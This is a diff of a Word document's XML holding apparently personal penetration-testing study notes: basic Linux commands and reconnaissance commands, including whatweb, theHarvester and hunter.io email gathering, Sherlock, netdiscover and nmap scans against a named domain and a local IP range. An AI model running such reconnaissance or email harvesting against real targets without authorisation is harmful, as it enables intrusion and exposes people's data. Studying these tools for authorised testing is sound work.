+            </w:r>
+            <w:r>
+              <w:t>kdir</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – add folder</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>rm</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ifconfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
+            <w:r>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> remove</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> file</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -258,24 +334,15 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>1. Do we have permission to attack?</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – current directory</w:t>
+            <w:r>
+              <w:t>rm folder -r</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -293,7 +360,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>cd - directory</w:t>
+              <w:t>touch – create file</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -310,16 +377,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>M</w:t>
-            </w:r>
-            <w:r>
-              <w:t>kdir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – add folder</w:t>
+            <w:r>
+              <w:t>echo {Description} &gt; {name of file}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -329,99 +388,10 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>rm</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> remove</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>rm folder -r</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>touch – create file</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>echo {Description} &gt; {name of file}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Virtual Machine </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+          <w:p>
+            <w:r>
+              <w:t>Virtual Machine msfadmin</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -513,15 +483,7 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">– to move </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>file{</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>mv file3.py FOLDERNAME}</w:t>
+              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -538,21 +500,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – ROOT USER</w:t>
+            <w:r>
+              <w:t>sudo su – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -725,19 +674,11 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>)</w:t>
+              <w:t>Ping()</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -754,19 +695,11 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> erertech.com</w:t>
+              <w:t>Nglookup erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -777,7 +710,6 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -790,7 +722,6 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -821,13 +752,8 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> erertech.com -v</w:t>
+            <w:r>
+              <w:t>Whatweb erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -862,7 +788,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -875,7 +800,6 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -895,7 +819,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -906,9 +829,45 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>hatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve">hatweb </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>erertech.com</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>whatweb 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>.168.1.4-192.168.1.255</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -919,49 +878,80 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>erertech.com</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -v</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 192</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>.168.1.4-192.168.1.255</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>–no</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>error</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Tool: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Getting email using </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>the Harvester &amp; hunger.io</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
@@ -970,33 +960,128 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>–no</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
               <w:t>-</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>error</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-b all</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>OR</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-hunter.io</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0DF"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> find email</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Redhawk(</w:t>
+            </w:r>
+            <w:r>
+              <w:t>software tools</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -1004,224 +1089,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Tool: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Getting email using </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>the Harvester &amp; hunger.io</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>help</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -d erertech.com </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-b all</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>OR</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-hunter.io</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:sym w:font="Wingdings" w:char="F0DF"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> find email</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>Redhawk(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>software tools</w:t>
-            </w:r>
-            <w:r>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
             <w:r>
               <w:t>Sherlock -&gt; python3 sherlock.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt install python-pip</w:t>
+            <w:r>
+              <w:t>Sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1480,31 +1360,13 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>netdiscover</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo netdiscover</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1575,7 +1437,6 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1583,11 +1444,7 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>Checking PORTS)</w:t>
+              <w:t>(Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1604,15 +1461,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>have to</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> put </w:t>
+              <w:t xml:space="preserve">You have to put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1739,17 +1588,63 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Nmap -sS {IPADDRESS}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t>never full connection</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>SYN</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> connection – better use</w:t>
+            </w:r>
+            <w:r>
+              <w:t>!</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Nmap -s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1757,60 +1652,13 @@
               </w:rPr>
               <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – </w:t>
-            </w:r>
-            <w:r>
-              <w:t>never full connection</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SYN</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> connection – better use</w:t>
-            </w:r>
-            <w:r>
-              <w:t>!</w:t>
-            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sU</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -1818,38 +1666,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1863,7 +1680,17 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>man nmap</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – manual, really helps!</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1877,25 +1704,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve">man </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – manual, really helps!</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1909,20 +1718,40 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Discovering Target Operating System</w:t>
+            </w:r>
